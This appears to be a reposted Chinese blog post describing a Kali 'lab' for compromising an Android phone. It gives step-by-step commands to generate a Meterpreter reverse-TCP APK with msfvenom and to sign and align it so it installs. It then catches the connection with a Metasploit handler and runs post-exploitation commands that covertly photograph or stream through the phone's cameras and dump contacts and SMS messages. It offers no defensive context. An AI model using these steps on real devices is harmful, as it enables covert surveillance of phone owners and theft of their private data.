kali入侵Android实验

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址(攻击机) LPORT= 4444 R> apk.apk(生成apk的路径及包名)
在这里插入图片描述android的安装包需要签名才能安装到android上,所以要先创建密钥库然后进行签名
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
在这里插入图片描述在这里插入图片描述然后对apk签名
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore apk.apk(包名) aliasname
在这里插入图片描述然后验签
jarsigner -verify -verbose -certs apk.apk(包名)
在这里插入图片描述验证apk
apt-get install zipalign
zipalign -v 4 apk.apk (原包名)NEWAPPNAME.apk(新包名)

然后把apk安装到Android端上…

然后使用meatsploit进行测试:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP地址(攻击机IP)

set LPORT 4444

exploit
在这里插入图片描述
webcam_list 查看手机有多少个摄像头
webcam_stream 开启摄像头
webcam_snap 隐秘拍照
在这里插入图片描述
dump_contacts 导出电话号码
dump_sms 导出短信
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_42727740/article/details/89455292